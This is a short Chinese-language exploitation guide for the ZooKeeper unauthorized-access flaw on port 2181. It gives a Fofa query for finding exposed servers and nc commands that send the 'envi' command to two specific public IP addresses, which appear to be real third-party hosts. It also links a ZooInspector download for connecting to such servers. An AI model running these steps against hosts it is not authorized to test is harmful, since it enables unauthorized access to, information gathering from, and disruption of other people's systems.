Zookeeper未授权访问漏洞
Zookeeper是分布式协同管理工具,常用来管理系统配置信息,提供分布式协同服务。Zookeeper的默认开放端口是 2181。Zookeeper安装部署之后默认情况下不需要任何身份验证,造成攻击者可以远程利用Zookeeper,通过服务器收集敏感信息或者在Zookeeper集群内进行破坏(比如:ki命令)。攻击者能够执行所有只允许由管理员运行的命令。
漏洞利用
步骤一:使用以下Fofa语法搜索资产信息
port="2181"
步骤二:在Kali中使用以下命令进行未授权访问漏洞测试.
echo envi | nc 114.242.175.75 2181
echo envi | nc 223.5.253.242 2181
步骤三:可使用Zookeeper可视化管理工具进行连接
#工具下载
https://issues.apache.org/jira/secure/attachment/12436620/ZooInspector.zip
下载在buld–>双击zookeeper-dev-ZooInspector.jar
